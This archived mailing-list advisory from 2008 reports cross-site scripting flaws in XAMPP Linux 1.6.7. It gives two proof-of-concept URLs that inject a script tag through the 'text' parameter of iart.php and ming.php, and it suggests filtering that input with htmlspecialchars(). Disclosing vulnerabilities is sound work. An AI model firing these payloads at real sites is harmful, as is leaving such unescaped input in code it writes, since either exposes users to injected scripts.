|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
irancrash
gmail.com
Date: Mon Aug 04 2008 - 09:13:04 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
----------------------------------------------------------------
Program : Xampp Linux 1.6.7
Type : Multiple Cross Site Scripting Vulnerabilities
Alert : Medium
----------------------------------------------------------------
Download From : http://puzzle.dl.sourceforge.net/sourceforge/xampp/xampp-linux-1.6.7.tar.gz
----------------------------------------------------------------
Discovered by : Khashayar Fereidani Or Dr.Crash
My Website : HTTP://FEREIDANI.IR
Team Website : Http://IRCRASH.COM
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com
----------------------------------------------------------------
Cross Site Scripting Vulnerabilities :
Vulnerability work when register_globals set as on .
http://Example.com/xampp/iart.php?text=">><<>>"''<script>alert(document.alert)</script>
http://Example.com/xampp/ming.php?text=">><<>>"''<script>alert(document.alert)</script>
Solution : Remove xampp folder or filter text variable with htmlspecialchars() function ....
----------------------------------------------------------------
Tnx : God
HTTP://IRCRASH.COM
----------------------------------------------------------------
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]